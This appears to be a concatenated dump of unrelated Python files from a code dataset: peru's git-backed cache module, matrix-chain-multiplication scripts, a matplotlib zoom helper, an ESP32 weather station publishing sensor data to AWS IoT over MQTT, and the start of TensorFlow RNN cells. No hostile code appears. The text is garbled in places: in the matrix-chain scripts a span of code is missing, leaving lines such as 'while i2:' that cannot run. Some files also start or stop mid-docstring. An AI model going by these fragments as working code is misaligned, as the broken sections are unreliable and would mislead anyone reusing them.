async def get_new_files_in_tree(self, previous_tree, new_tree):\n added_files_output = await self.git('diff-tree', '--diff-filter=A',\n '--name-only', '-r', '-z',\n previous_tree, new_tree)\n return added_files_output.split('\\x00')\n\n async def read_tree_updating_working_copy(self, tree, force):\n '''This method relies on the current working copy being clean with\n respect to the current index. The benefit of this over\n checkout_missing_files_from_index(), is that is clean up files that get\n deleted between the current tree and the new one. Without force, this\n raises an error rather than overwriting modified files.'''\n if force:\n await self.git('read-tree', '--reset', '-u', tree)\n else:\n await self.git('read-tree', '-m', '-u', tree)\n\n async def checkout_files_from_index(self):\n # This recreates any deleted files. As far as I can tell,\n # checkout-index has no equivalent of the --full-tree flag we use with\n # ls-tree below. Instead, the --all flag seems to respect the directory\n # from which it's invoked, and only check out files below that\n # directory. This, this is currently the only command we invoke with an\n # explicit cwd. Original bug report:\n # https://github.com/buildinspace/peru/issues/210\n await self.git('checkout-index', '--all', cwd=self.working_copy)\n\n async def get_info_for_path(self, tree, path):\n # --full-tree makes ls-tree ignore the cwd. As in list_tree_entries,\n # prepend ./ to avoid interpreting leading colons in pathspecs.\n ls_output = await self.git('ls-tree', '--full-tree', '-z', tree,\n \"./\" + path)\n ls_lines = ls_output.strip('\\x00').split('\\x00')\n # Remove empty lines.\n ls_lines = list(filter(None, ls_lines))\n if len(ls_lines) == 0:\n raise FileNotFoundError('Path \"{}\" not found in tree {}.'.format(\n path, tree))\n assert len(ls_lines) == 1\n mode, type, sha1, name = ls_lines[0].split()\n return mode, type, sha1, name\n\n async def read_bytes_from_file_hash(self, sha1):\n return (await self.git(\n 'cat-file', '-p', sha1, output_mode=BINARY_MODE))\n\n async def list_tree_entries(self, tree, path, recursive):\n # Lines in ls-tree are of the following form (note that the wide space\n # is a tab):\n # 100644 blob a2b67564ae3a7cb3237ee0ef1b7d26d70f2c213f README.md\n entry_regex = r'(\\w+) (\\w+) (\\w+)\\t(.*)'\n command = ['ls-tree', '-z', tree]\n if path is not None:\n # If we do something like `git ls-tree -r -t HEAD foo/bar`, git\n # will include foo in the output, because it was traversed. We\n # filter those entries out below, by excluding results that are\n # shorter than the original path. However, git will canonicalize\n # paths in its output, and we need to match that behavior for the\n # comparison to work.\n canonical_path = str(pathlib.PurePosixPath(path))\n # However, another complication: ls-tree arguments are what git\n # calls \"pathspecs\". That means that leading colons have a special\n # meaning. In order to support leading colons, we always prefix the\n # path with dot-slash in git's arguments. As noted above, the\n # dot-slash will be stripped again in the final output.\n command += [\"./\" + canonical_path]\n if recursive:\n # -t means tree entries are included in the listing.\n command += ['-r', '-t']\n output = await self.git(*command)\n if not output:\n return {}\n entries = {}\n for line in output.strip('\\x00').split('\\x00'):\n mode, type, hash, name = re.match(entry_regex, line).groups()\n if (recursive and path is not None\n and len(name) < len(canonical_path) and type == TREE_TYPE):\n # In recursive mode, leave out the parents of the target dir.\n continue\n entries[name] = TreeEntry(mode, type, hash)\n return entries\n\n async def make_tree_from_entries(self, entries):\n entry_format = '{} {} {}\\t{}'\n input = '\\x00'.join(\n entry_format.format(mode, type, hash, name)\n for name, (mode, type, hash) in entries.items())\n tree = await self.git('mktree', '-z', input=input)\n return tree\n\n\nasync def Cache(root):\n 'This is the async constructor for the _Cache class.'\n cache = _Cache(root)\n await cache._init_trees()\n return cache\n\n\nclass _Cache:\n def __init__(self, root):\n \"Don't instantiate this class directly. Use the Cache() constructor.\"\n self.root = root\n self.plugins_root = os.path.join(root, \"plugins\")\n makedirs(self.plugins_root)\n self.tmp_path = os.path.join(root, \"tmp\")\n makedirs(self.tmp_path)\n self.keyval = KeyVal(os.path.join(root, 'keyval'), self.tmp_path)\n self.trees_path = os.path.join(root, \"trees\")\n self._empty_tree = None\n\n async def _init_trees(self):\n if not os.path.exists(os.path.join(self.trees_path, 'HEAD')):\n makedirs(self.trees_path)\n with self.clean_git_session() as session:\n await session.init_git_dir()\n # Override any .gitattributes files that might be in the sync dir,\n # by writing 'info/attributes' in the bare repo. There are many\n # attributes that we might want to disable, but disabling 'text'\n # seems to take care of both 'text' and 'eol', which are the two\n # that I know can cause problems. We might need to add more\n # attributes here in the future. Note that other config files are\n # disabled in _git_env below.\n attributes_path = os.path.join(self.trees_path, 'info',\n 'attributes')\n with open(attributes_path, 'w') as attributes:\n # Disable the 'text' attribute for all files.\n attributes.write('* -text')\n\n @contextlib.contextmanager\n def clean_git_session(self, working_copy=None):\n with self.keyval.tmp_dir_context() as tmp_dir:\n # Git will initialize a nonexistent index file. Empty files cause\n # an error though.\n index_file = os.path.join(tmp_dir, \"index\")\n yield GitSession(self.trees_path, index_file, working_copy)\n\n def no_index_git_session(self):\n return GitSession(self.trees_path, os.devnull, os.devnull)\n\n async def get_empty_tree(self):\n if not self._empty_tree:\n with self.clean_git_session() as session:\n self._empty_tree = await session.make_tree_from_index()\n return self._empty_tree\n\n async def import_tree(self, src, *, picks=None, excludes=None):\n if not os.path.exists(src):\n raise RuntimeError('import tree called on nonexistent path ' + src)\n with self.clean_git_session(src) as session:\n await session.read_working_copy_into_index(picks)\n\n # We want to avoid ever importing a .peru directory. This is a\n # security/correctness issue similar to git's issue with .git dirs,\n # and just like git we need to watch out for case-insensitive\n # filesystems. See also:\n # https://github.com/blog/1938-vulnerability-announced-update-your-git-clients.\n full_excludes = dotperu_exclude_case_insensitive_git_globs()\n if excludes:\n full_excludes += excludes\n await session.drop_paths_from_index(full_excludes)\n\n tree = await session.make_tree_from_index()\n return tree\n\n async def merge_trees(self, base_tree, merge_tree, merge_path='.'):\n with self.clean_git_session() as session:\n if base_tree:\n await session.read_tree_into_index(base_tree)\n try:\n await session.merge_tree_into_index(merge_tree, merge_path)\n except GitError as e:\n raise MergeConflictError(e.stdout) from e\n unified_tree = await session.make_tree_from_index()\n return unified_tree\n\n async def export_tree(self,\n tree,\n dest,\n previous_tree=None,\n *,\n force=False,\n previous_index_file=None):\n '''This method is the core of `peru sync`. If the contents of \"dest\"\n match \"previous_tree\", then export_tree() updates them to match \"tree\".\n If not, it raises an error and doesn't touch any files.\n\n Because it's important for the no-op `peru sync` to be fast, we make an\n extra optimization for this case. The caller passes in the path to the\n index file used during the last sync, which should already reflect\n \"previous_tree\". That allows us to skip the read-tree and update-index\n calls, so all we have to do is a single diff-files operation to check\n for cleanliness.\n\n It's difficult to predict all the different states the index file might\n end up in under different error conditions, not only now but also in\n past and future git versions. For safety and simplicity, if any\n operation returns an error code, we delete the supplied index file.\n Right now this includes expected errors, like \"sync would overwrite\n existing files,\" and unexpected errors, like \"index is on fire.\"'''\n\n tree = tree or (await self.get_empty_tree())\n previous_tree = previous_tree or (await self.get_empty_tree())\n\n makedirs(dest)\n\n with contextlib.ExitStack() as stack:\n\n # If the caller gave us an index file, create a git session around\n # it. Otherwise, create a clean one. Note that because we delete\n # the index file whenever there are errors, we also allow the\n # caller to pass in a path to a nonexistent file. In that case we\n # have to pay the cost to recreate it.\n did_refresh = False\n if previous_index_file:\n session = GitSession(self.trees_path, previous_index_file,\n dest)\n stack.enter_context(delete_if_error(previous_index_file))\n if not os.path.exists(previous_index_file):\n did_refresh = True\n await session.read_tree_and_stats_into_index(previous_tree)\n else:\n session = stack.enter_context(self.clean_git_session(dest))\n did_refresh = True\n await session.read_tree_and_stats_into_index(previous_tree)\n\n # The fast path. If the previous tree is the same as the current\n # one, and no files have changed at all, short-circuit.\n if previous_tree == tree:\n if (await session.working_copy_matches_index()):\n return\n\n # Everything below is the slow path. Some files have changed, or\n # the tree has changed, or both. If we didn't refresh the index\n # file above, we must do so now.\n if not did_refresh:\n await session.read_tree_and_stats_into_index(previous_tree)\n modified = await session.get_modified_files_skipping_deletes()\n if modified and not force:\n raise DirtyWorkingCopyError(\n 'Imported files have been modified ' +\n '(use --force to overwrite):\\n\\n' +\n _format_file_lines(modified))\n\n # Do all the file updates and deletions needed to produce `tree`.\n try:\n await session.read_tree_updating_working_copy(tree, force)\n except GitError:\n # Give a more informative error if we failed because files that\n # are new in `tree` already existed in the working copy.\n new_files = await session.get_new_files_in_tree(\n previous_tree, tree)\n existing_new_files = [\n f for f in new_files\n if f and os.path.exists(os.path.join(dest, f))\n ]\n existing_new_files.sort()\n if existing_new_files:\n raise DirtyWorkingCopyError(\n 'Imports would overwrite preexisting files '\n '(use --force to write anyway):\\n\\n' +\n _format_file_lines(existing_new_files))\n else:\n # We must've failed for some other reason. Let the error\n # keep going.\n raise\n\n # Recreate any missing files.\n await session.checkout_files_from_index()\n\n async def read_file(self, tree, path):\n # TODO: Make this handle symlinks in the tree.\n with self.clean_git_session() as session:\n mode, type, sha1, name = await session.get_info_for_path(\n tree, path)\n if type == 'tree':\n raise IsADirectoryError(\n 'Path \"{}\" in tree {} is a directory.'.format(path, tree))\n assert type == 'blob'\n return (await session.read_bytes_from_file_hash(sha1))\n\n async def ls_tree(self, tree, path=None, *, recursive=False):\n session = self.no_index_git_session()\n return (await session.list_tree_entries(tree, path, recursive))\n\n async def modify_tree(self, tree, modifications):\n '''The modifications are a map of the form, {path: TreeEntry}. The tree\n can be None to indicate an empty starting tree. The entries can be\n either blobs or trees, or None to indicate a deletion. The return value\n is either the hash of the resulting tree, or None if the resulting tree\n is empty. Modifications in parent directories are done before\n modifications in subdirectories below them, so for example you can\n insert a tree at a given path and also insert more new stuff beneath\n that path, without fear of overwriting the new stuff.'''\n\n # Read the original contents of the base tree.\n if tree is None:\n entries = {}\n else:\n entries = await self.ls_tree(tree, '.')\n\n # Separate the modifications into two groups, those that refer to\n # entries at the base of this tree (e.g. 'foo'), and those that refer\n # to entries in subtrees (e.g. 'foo/bar').\n modifications_at_base = dict()\n modifications_in_subtrees = collections.defaultdict(dict)\n for path_str, entry in modifications.items():\n # Canonicalize paths to get rid of duplicate/trailing slashes.\n path = pathlib.PurePosixPath(path_str)\n\n # Check for nonsense paths.\n # TODO: Maybe stop recursive calls from repeating these checks.\n if len(path.parts) == 0:\n raise ModifyTreeError('Cannot modify an empty path.')\n elif path.parts[0] == '/':\n raise ModifyTreeError('Cannot modify an absolute path.')\n elif '..' in path.parts:\n raise ModifyTreeError('.. is not allowed in tree paths.')\n\n if len(path.parts) == 1:\n modifications_at_base[str(path)] = entry\n else:\n first_dir = path.parts[0]\n rest = str(pathlib.PurePosixPath(*path.parts[1:]))\n modifications_in_subtrees[first_dir][rest] = entry\n\n # Insert or delete entries in the base tree. Note that this happens\n # before any subtree operations.\n for name, entry in modifications_at_base.items():\n if entry is None:\n entries.pop(name, None)\n else:\n entries[name] = entry\n\n # Recurse to compute modified subtrees. Note how we handle deletions:\n # If 'a' is a file, inserting a new file at 'a/b' will implicitly\n # delete 'a', but trying to delete 'a/b' will be a no-op and will not\n # delete 'a'.\n empty_tree = (await self.get_empty_tree())\n for name, sub_modifications in modifications_in_subtrees.items():\n subtree_base = None\n if name in entries and entries[name].type == TREE_TYPE:\n subtree_base = entries[name].hash\n new_subtree = await self.modify_tree(subtree_base,\n sub_modifications)\n if new_subtree != empty_tree:\n entries[name] = TreeEntry(TREE_MODE, TREE_TYPE, new_subtree)\n # Delete an empty tree if it was actually a tree to begin with.\n elif name in entries and entries[name].type == TREE_TYPE:\n del entries[name]\n\n # Return the resulting tree, or None if empty.\n if entries:\n session = self.no_index_git_session()\n tree = await session.make_tree_from_entries(entries)\n return tree\n else:\n return empty_tree\n\n\n@contextlib.contextmanager\ndef delete_if_error(path):\n '''If any exception is raised inside the context, delete the file at the\n given path, and allow the exception to continue.'''\n try:\n yield\n except Exception:\n if os.path.exists(path):\n os.remove(path)\n raise\n\n\ndef _format_file_lines(files):\n '''Given a list of filenames that we're about to print, limit it to a\n reasonable number of lines.'''\n LINES_TO_SHOW = 10\n if len(files) <= LINES_TO_SHOW:\n lines = '\\n'.join(files)\n else:\n lines = ('\\n'.join(files[:LINES_TO_SHOW - 1]) + '\\n...{} total'.format(\n len(files)))\n return lines\n\n\nclass GitError(Exception):\n def __init__(self, command, errorcode, stdout, stderr):\n self.command = \" \".join(command)\n self.errorcode = errorcode\n self.stdout = stdout\n self.stderr = stderr\n message = textwrap.dedent('''\\\n git command \"{}\" returned error code {}.\n stdout: {}\n stderr: {}''').format(command, errorcode, stdout, stderr)\n Exception.__init__(self, message)\n\n\nclass ModifyTreeError(PrintableError):\n pass\n\n\nclass DirtyWorkingCopyError(PrintableError):\n pass\n\n\nclass MergeConflictError(PrintableError):\n pass\n\n\nTreeEntry = collections.namedtuple('TreeEntry', ['mode', 'type', 'hash'])\n\nBLOB_TYPE = 'blob'\nTREE_TYPE = 'tree'\n\nNONEXECUTABLE_FILE_MODE = '100644'\nEXECUTABLE_FILE_MODE = '100755'\nTREE_MODE = '040000'\n\n# All possible ways to capitalize \".peru\", to exclude from imported trees.\nDOTPERU_CAPITALIZATIONS = [\n '.peru',\n '.Peru',\n '.pEru',\n '.peRu',\n '.perU',\n '.PEru',\n '.PeRu',\n '.PerU',\n '.pERu',\n '.pErU',\n '.peRU',\n '.PERu',\n '.PErU',\n '.PeRU',\n '.pERU',\n '.PERU',\n]\n\n\ndef dotperu_exclude_case_insensitive_git_globs():\n \"\"\"These use the glob syntax accepted by `git ls-files` (NOT our own\n glob.py). Note that ** must match at least one path component, so we have\n to use separate globs for matches at the root and matches below.\"\"\"\n globs = []\n for capitalization in DOTPERU_CAPITALIZATIONS:\n globs.append(capitalization + '/**')\n globs.append('**/' + capitalization + '/**')\n return globs\n","repo_name":"buildinspace/peru","sub_path":"peru/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":26022,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"35"} +{"seq_id":"34235353732","text":"import sys\ndef brackets(arr,k_table,main):\n if len(arr)>2:\n bracket=arr.index(\"A\"+str(k_table[main.index(arr[0])][main.index(arr[len(arr)-1])]))\n new=[arr[:bracket+1],arr[bracket+1:]] \n if new!=arr and new[1]!=arr and new[0]!=arr:\n if(len(new[0])>1):\n new[0]=brackets(new[0],k_table,main)\n if len(new[1])>1: \n new[1]=brackets(new[1],k_table,main)\n \n return new\n else:\n return arr\n\ndef mcm(arr):\n matrix=[[0 for j in range(len(arr)-1)] for i in range(len(arr)-1)]\n k_table=[[0 for j in range(len(arr)-1)] for i in range(len(arr)-1)]\n arr.append(arr.pop(0))\n for v in range(1,len(arr)):\n i,j=0,v\n while i2:\n bracket=arr.index(\"A\"+str(k_table[main.index(arr[0])+1][main.index(arr[len(arr)-1])+1]))\n new=[arr[:bracket+1],arr[bracket+1:]] \n if new!=arr and new[1]!=arr and new[0]!=arr:\n if(len(new[0])>1):\n new[0]=brackets(new[0],k_table,main)\n if len(new[1])>1: \n new[1]=brackets(new[1],k_table,main)\n \n return new\n else:\n return arr\ndef mcm(p):\n matrix={k+1:{l+1:0 for l in range(0,len(p)-1)} for k in range(len(p)-1)}\n r={k+1:{l+1:0 for l in range(0,len(p)-1)} for k in range(len(p)-1)}\n\n for i in range(1,len(p)):\n x,y=1,i+1\n while x w/h=1.57 | h/w=0.64\n lbwh = (0.02,0.05,0.96,0.9) => \n\t\tlrbt = (0.02,0.9,0.05,0.95)\n\t'''\n\timport numpy as np\n\timport matplotlib.pyplot as plt\n\tfrom jizhipy.Plot import Color, Axes\n\tif (facecolor1 is None) : facecolor1 = 'none'\n\tif (facecolor2 is None) : facecolor2 = 'none'\n\tif (edgecolor1 is None) : edgecolor1 = 'none'\n\tif (edgecolor2 is None) : edgecolor2 = 'none'\n\t#----------------------------------------\n\tdef box2lrbt( box ) : return (box['left'], box['right'], box['bottom'], box['top'])\n\tdef lrbt2box( lrbt ) : return {'left':lrbt[0], 'right':lrbt[1], 'bottom':lrbt[2], 'top':lrbt[3]}\n\t#----------------------------------------\n\tdef LBWH( lrbt ) : # conver lrbt to lbwh and xy\n\t\tl, r, b, t = lrbt\n\t\tw, h = r-l, t-b\n\t#\tpars = FigureFrame()\n\t\tpars = {'left':0, 'right':1, 'bottom':0, 'top':1}\n\t\tw0 = pars['right'] - pars['left']\n\t\th0 = pars['top'] - pars['bottom']\n\t\tl, w = pars['left']+l*w0, w*w0\n\t\tb, h = pars['bottom']+b*h0, h*h0\n\t\tlbwh = [l, b, w, h]\n\t\tr, t = l+w, b+h\n\t\txy = np.array([(r,t), (l,t), (l,b), (r,b)])\n\t\treturn lbwh, xy\n\t#----------------------------------------\n\tlrbt1, lrbt2 = None, None\n\tif (box1 is not None) : lrbt1 = box2lrbt(box1)\n\tif (box2 is not None) : lrbt2 = box2lrbt(box2)\n\t#----------------------------------------\n\tif (link1 is None) : # NOT link\n\t\tec0, fc0 = Color.Edgecolor(edgecolor1), Color.Facecolor(facecolor1)\n\t\taxlist, ax1, ax2, lbwh1, lbwh2 = [], None, None, None, None\n\t\tif (lrbt1 is not None) : \n\t\t\tColor.Edgecolor(edgecolor1)\n\t\t\tColor.Facecolor(facecolor1)\n\t\t\tlbwh1 = LBWH( lrbt1)[0]\n\t\t\tax1 = plt.axes(lbwh1)\n\t\t\taxlist.append(ax1)\n\t\t\tif (labeloff1) : \n\t\t\t\tAxes.Label('both', left=False, right=False, top=False, bottom=False)\n\t\t\t\tAxes.Tick('both', 'both', left=False, right=False, top=False, bottom=False)\n\t\t\tif (frameoff1) : Axes.Frameoff(ax1)\n\t\t#----------------------------------------\n\t\tif (lrbt2 is not None) : \n\t\t\tColor.Edgecolor(edgecolor2)\n\t\t\tColor.Facecolor(facecolor2)\n\t\t\tlbwh2 = LBWH(lrbt2)[0]\n\t\t\tax2 = plt.axes(lbwh2)\n\t\t\taxlist.append(ax2)\n\t\t\tif (labeloff2) : \n\t\t\t\tAxes.Label('both', left=False, right=False, top=False, bottom=False)\n\t\t\t\tAxes.Tick('both', 'both', left=False, right=False, top=False, bottom=False)\n\t\t\tif (frameoff2) : Axes.Frameoff(ax2)\n\t\t#----------------------------------------\n\t\tColor.Edgecolor(ec0), Color.Facecolor(fc0)\n\t\tif (lrbt1 is not None and lrbt2 is None) : \n\t\t\taxlist = [ax1, lrbt2box(lrbt1)]\n\t\telif (lrbt1 is not None and lrbt2 is not None) : \n\t\t\taxlist = [ax1, ax2, lrbt2box(lrbt1), lrbt2box(lrbt2)]\n\t\treturn axlist\n\t#----------------------------------------\n\t#----------------------------------------\n\telse : # link\n\t\tfrom jizhipy.Basic import IsType\n\t\tfrom jizhipy.Array import Asarray\n\t\tfrom mpl_toolkits.axes_grid1.inset_locator import mark_inset\n\t\tif (link2 is None) : link2 = link1\n\t\tlink1, link2 = Asarray(link1), Asarray(link2) \n\t\tn = min(len(link1), len(link2))\n\t\tlink1, link2 = link1[:n], link2[:n]\n\t\t#----------------------------------------\n\t\tec0, fc0 = Color.Edgecolor('none'), Color.Facecolor('none')\n\t\tlbwh1 = LBWH(lrbt1)[0]\n\t\tax1 = plt.axes(lbwh1)\n\t\tAxes.Frameoff(ax1)\n\t\t#----------------------------------------\n\t\tlbwh2, xy2 = LBWH(lrbt2)\n\t\tw0, h0 = 0.0001, 0.0001\n\t\tfor i in range(n) : \n\t\t\tl1, l2 = link1[i], link2[i]\n\t\t\tx, y = xy2[l2-1]\n\t\t\tif (l1 == 1) : lbwh = [x-w0, y-h0, w0, h0]\n\t\t\telif (l1 == 2) : lbwh = [x, y-h0, w0, h0]\n\t\t\telif (l1 == 3) : lbwh = [x, y, w0, h0]\n\t\t\telif (l1 == 4) : lbwh = [x-w0, y, w0, h0]\n\t\t\tax2 = plt.axes(lbwh)\n\t\t\tAxes.Frameoff(ax2)\n\t\t\tmark_inset(ax1, ax2, l1, l1, fc='none', ec=edgecolor2) # when use mark_inset() to link, frame of ax1 can NOT be remove while ax2 can. Therefore, use axlist[0] to be original image, axlist[1] to be the zoom region.\n\t\t#----------------------------------------\n\t\t# Re-plot ax1, ax2\n\t\tColor.Edgecolor(edgecolor1)\n\t\tColor.Facecolor(facecolor1)\n\t\th1, h2 = lbwh1[-1]*0.9999, lbwh2[-1]*0.9999\n\t\td1, d2 = lbwh1[-1]*0.0001, lbwh2[-1]*0.0001\n\t\tlbwh1[-1] = h1\n\t\tlbwh2[-1] = h2\n\t\tax1 = plt.axes(lbwh1) #@#@\n\t\tif (labeloff1) : \n\t\t\tAxes.Label('both', left=False, right=False, top=False, bottom=False, ax=ax1)\n\t\t\tAxes.Tick('both', 'both', left=False, right=False, top=False, bottom=False)\n\t\tif (frameoff1) : Axes.Frameoff(ax1)\n\t\tColor.Edgecolor(edgecolor2)\n\t\tColor.Facecolor(facecolor2)\n\t\tax2 = plt.axes(lbwh2) #@#@\n\t\tif (labeloff2) : \n\t\t\tAxes.Label('both', left=False, right=False, top=False, bottom=False, ax=ax2)\n\t\t\tAxes.Tick('both', 'both', left=False, right=False, top=False, bottom=False)\n\t\tif (frameoff2) : Axes.Frameoff(ax2)\n\t\tColor.Edgecolor(ec0), Color.Facecolor(fc0)\n\t\tlrbt1, lrbt2 = list(lrbt1), list(lrbt2)\n\t\tlrbt1[-1] -= d1\n\t\tlrbt2[-1] -= d2\n\t\taxlist =[ax1,ax2,lrbt2box(lrbt1),lrbt2box(lrbt2)]\n\t\treturn axlist\n\n","repo_name":"jizhi/jizhipy","sub_path":"Plot/Zoom.py","file_name":"Zoom.py","file_ext":"py","file_size_in_byte":7652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"15913497388","text":"# Imports\r\nfrom umqtt.robust import MQTTClient\r\nimport time\r\nimport ujson\r\nfrom time import sleep\r\nimport dht\r\nimport sds011\r\nfrom machine import Pin, UART\r\n\r\n# AWS settings\r\nHOST = \"weather_station(can be whatever name you want)\"\r\nREGION = \"AWS REGION\"\r\nMQTT_HOST = \"YOUR_AWS_IOT_ENDPOINT\" #Your AWS IoT endpoint\r\n\r\nCERT_FILE = \"/device_certificate.pem.crt\" #the \".crt\" may be hidden that’s ok\r\nKEY_FILE = \"/private_key.key\"\r\n\r\nMQTT_CLIENT_ID = \"weather_station\"\r\nMQTT_PORT = 8883 #MQTT secured\r\n\r\nPUB_TOPIC = \"iot/outTopic\" #coming out of device\r\nSUB_TOPIC = \"iot/inTopic\" #coming into device\r\n\r\n# SDS011 worrks with uart. Set pins used for uart on ESP32\r\nuart = UART(1, baudrate = 9600, rx = 5, tx = 4)\r\ndust_sensor = sds011.SDS011(uart)\r\ndust_sensor.sleep()\r\n\r\n# Create a DHT sensor object and call methods to get values\r\nsensor = dht.DHT22(Pin(2))\r\nsensor.measure()\r\ntemp = sensor.temperature() * 9/5 + 32\r\nhumidity = sensor.humidity()\r\n\r\n\r\nWIFI_SSID = \"Name Of WIFI Here\"\r\nWIFI_PW = \"Password to wifi here\"\r\n\r\nMQTT_CLIENT = None\r\n\r\nprint(\"starting program\")\r\n\r\n# Function to connect to local wi-fi\r\ndef network_connect():\r\n print(\"starting connection method\")\r\n import network\r\n sta_if = network.WLAN(network.STA_IF)\r\n if not sta_if.isconnected():\r\n print('connecting to network...')\r\n sta_if.active(True)\r\n sta_if.connect(WIFI_SSID , WIFI_PW)\r\n while not sta_if.isconnected():\r\n pass\r\n print('network config:', sta_if.ifconfig())\r\n\r\n\r\n \r\ndef pub_msg(msg): #publish is synchronous so we poll and publish\r\n global MQTT_CLIENT\r\n try: \r\n MQTT_CLIENT.publish(PUB_TOPIC, msg)\r\n print(\"Sent: \" + msg)\r\n except Exception as e:\r\n print(\"Exception publish: \" + str(e))\r\n raise\r\n\r\ndef sub_cb(topic, msg):\r\n print('Device received a Message: ')\r\n print((topic, msg)) #print incoming message, waits for loop below\r\n pin.value(0) #blink if incoming message by toggle off\r\n\r\ndef device_connect(): \r\n global MQTT_CLIENT\r\n\r\n try: #all this below runs once, equivalent to Arduino's \"setup\" function)\r\n with open(KEY_FILE, \"r\") as f: \r\n key = f.read()\r\n print(\"Got Key\")\r\n \r\n with open(CERT_FILE, \"r\") as f: \r\n cert = f.read()\r\n print(\"Got Cert\")\r\n\r\n MQTT_CLIENT = MQTTClient(client_id=MQTT_CLIENT_ID, server=MQTT_HOST, port=MQTT_PORT, keepalive=5000, ssl=True, ssl_params={\"cert\":cert, \"key\":key, \"server_side\":False})\r\n MQTT_CLIENT.connect()\r\n print('MQTT Connected')\r\n MQTT_CLIENT.set_callback(sub_cb)\r\n MQTT_CLIENT.subscribe(SUB_TOPIC)\r\n print('Subscribed to %s as the incoming topic' % (SUB_TOPIC))\r\n return MQTT_CLIENT\r\n except Exception as e:\r\n print('Cannot connect MQTT: ' + str(e))\r\n raise\r\n\r\n\r\n#start execution\r\ntry:\r\n print(\"Connecting WIFI\")\r\n network_connect()\r\n print(\"Connecting MQTT\")\r\n device_connect()\r\n while True: #loop forever\r\n pending_message = MQTT_CLIENT.check_msg() # check for new subscription payload incoming\r\n if pending_message != 'None': #check if we have a message\r\n dust_sensor.wake()\r\n time.sleep(5)\r\n # #Returns NOK if no measurement found in reasonable time\r\n status = dust_sensor.read()\r\n #Returns NOK if checksum failed\r\n pkt_status = dust_sensor.packet_status\r\n #Stop fan\r\n dust_sensor.sleep()\r\n sensor.measure()\r\n temp = sensor.temperature() * 9/5 + 32\r\n humidity = sensor.humidity()\r\n deviceTime = time.time()\r\n values = {\"temperature\": temp,\r\n \"humidity\": humidity,\r\n \"pm2.5\": dust_sensor.pm25,\r\n \"pm10\": dust_sensor.pm10}\r\n pm25 = dust_sensor.pm25\r\n pm10 = dust_sensor.pm10\r\n print(\"Publishing\")\r\n# pub_msg(ujson.dumps(values))\r\n pub_msg(\"{\\n \\\"temperature\\\": %d,\\n \\\"humidity\\\": %d,\\n \\\"pm25\\\": %d,\\n \\\"pm10\\\": %d \\n}\"%(temp,humidity,pm25,pm10))\r\n print(\"published payload\")\r\n time.sleep(5) #A 5 second delay between publishing, adjust as you like\r\n \r\nexcept Exception as e:\r\n print(str(e))","repo_name":"MilesofCode/IoTProjects","sub_path":"weather_station_main.py","file_name":"weather_station_main.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19304713054","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport math\n\nfrom tensorflow.contrib.compiler import jit\nfrom tensorflow.contrib.layers.python.layers import layers\nfrom tensorflow.contrib.rnn.python.ops import core_rnn_cell\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import op_def_registry\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.layers import base as base_layer\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import clip_ops\nfrom tensorflow.python.ops import gen_array_ops\nfrom tensorflow.python.ops import init_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn_impl # pylint: disable=unused-import\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import partitioned_variables # pylint: disable=unused-import\nfrom tensorflow.python.ops import random_ops\nfrom tensorflow.python.ops import rnn_cell_impl\nfrom tensorflow.python.ops import variable_scope as vs\nfrom tensorflow.python.platform import tf_logging as logging\nfrom tensorflow.python.util import nest\n\n\ndef _get_concat_variable(name, shape, dtype, num_shards):\n \"\"\"Get a sharded variable concatenated into one tensor.\"\"\"\n sharded_variable = _get_sharded_variable(name, shape, dtype, num_shards)\n if len(sharded_variable) == 1:\n return sharded_variable[0]\n\n concat_name = name + \"/concat\"\n concat_full_name = vs.get_variable_scope().name + \"/\" + concat_name + \":0\"\n for value in ops.get_collection(ops.GraphKeys.CONCATENATED_VARIABLES):\n if value.name == concat_full_name:\n return value\n\n concat_variable = array_ops.concat(sharded_variable, 0, name=concat_name)\n ops.add_to_collection(ops.GraphKeys.CONCATENATED_VARIABLES, concat_variable)\n return concat_variable\n\n\ndef _get_sharded_variable(name, shape, dtype, num_shards):\n \"\"\"Get a list of sharded variables with the given dtype.\"\"\"\n if num_shards > shape[0]:\n raise ValueError(\"Too many shards: shape=%s, num_shards=%d\" % (shape,num_shards))\n unit_shard_size = int(math.floor(shape[0] / num_shards))\n remaining_rows = shape[0] - unit_shard_size * num_shards\n\n shards = []\n for i in range(num_shards):\n current_size = unit_shard_size\n if i < remaining_rows:\n current_size += 1\n shards.append(\n vs.get_variable(\n name + \"_%d\" % i, [current_size] + shape[1:], dtype=dtype))\n return shards\n\n\ndef _norm(g, b, inp, scope):\n shape = inp.get_shape()[-1:]\n gamma_init = init_ops.constant_initializer(g)\n beta_init = init_ops.constant_initializer(b)\n with vs.variable_scope(scope):\n # Initialize beta and gamma for use by layer_norm.\n vs.get_variable(\"gamma\", shape=shape, initializer=gamma_init)\n vs.get_variable(\"beta\", shape=shape, initializer=beta_init)\n normalized = layers.layer_norm(inp, reuse=True, scope=scope)\n return normalized\n\n\n\nclass ConvLSTMCell(rnn_cell_impl.RNNCell):\n \"\"\"Convolutional LSTM recurrent network cell, we added \"reuse\" item.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n\n def __init__(self,\n conv_ndims,\n input_shape,\n output_channels,\n kernel_shape,\n use_bias=True,\n skip_connection=False,\n forget_bias=1.0,\n initializers=None,\n reuse=None):\n \"\"\"Construct ConvLSTMCell.\n\n Args:\n conv_ndims: Convolution dimensionality (1, 2 or 3).\n input_shape: Shape of the input as int tuple, excluding the batch size.\n output_channels: int, number of output channels of the conv LSTM.\n kernel_shape: Shape of kernel as in tuple (of size 1,2 or 3).\n use_bias: (bool) Use bias in convolutions.\n skip_connection: If set to `True`, concatenate the input to the\n output of the conv LSTM. Default: `False`.\n forget_bias: Forget bias.\n initializers: Unused.\n name: Name of the module.\n\n Raises:\n ValueError: If `skip_connection` is `True` and stride is different from 1\n or if `input_shape` is incompatible with `conv_ndims`.\n 